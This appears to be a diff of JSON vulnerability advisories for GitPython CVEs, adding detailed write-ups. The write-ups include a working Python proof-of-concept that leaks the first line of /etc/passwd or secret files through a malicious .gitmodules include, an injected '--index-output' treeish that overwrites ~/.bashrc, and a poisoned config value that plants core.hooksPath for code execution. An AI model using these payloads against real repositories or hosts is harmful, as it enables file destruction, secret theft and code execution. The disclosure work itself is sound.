`IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-apm-CVE-2026-76220.json b/advisories/BREW-apm-CVE-2026-76220.json index 835de042a25..7f264f484d9 100644 --- a/advisories/BREW-apm-CVE-2026-76220.json +++ b/advisories/BREW-apm-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76220", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-apm-CVE-2026-76221.json b/advisories/BREW-apm-CVE-2026-76221.json index 84d394c18a3..40f3d3b6aab 100644 --- a/advisories/BREW-apm-CVE-2026-76221.json +++ b/advisories/BREW-apm-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76221", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-04T08:44:14Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-76222.json b/advisories/BREW-apm-CVE-2026-76222.json index 3bbb7556553..a347cf3fbae 100644 --- a/advisories/BREW-apm-CVE-2026-76222.json +++ b/advisories/BREW-apm-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76222", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-04T08:44:14Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-apm-CVE-2026-78675.json b/advisories/BREW-apm-CVE-2026-78675.json index 51bd38b8abe..806a8d78494 100644 --- a/advisories/BREW-apm-CVE-2026-78675.json +++ b/advisories/BREW-apm-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-78675", "published": "2026-09-04T08:44:32Z", - "modified": "2026-09-04T08:44:32Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,27 +46,56 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-apm-CVE-2026-78676.json b/advisories/BREW-apm-CVE-2026-78676.json index 4221ddd6ef2..44565eb4a6e 100644 --- a/advisories/BREW-apm-CVE-2026-78676.json +++ b/advisories/BREW-apm-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-78676", "published": "2026-09-04T08:44:32Z", - "modified": "2026-09-04T08:44:32Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,27 +46,44 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## 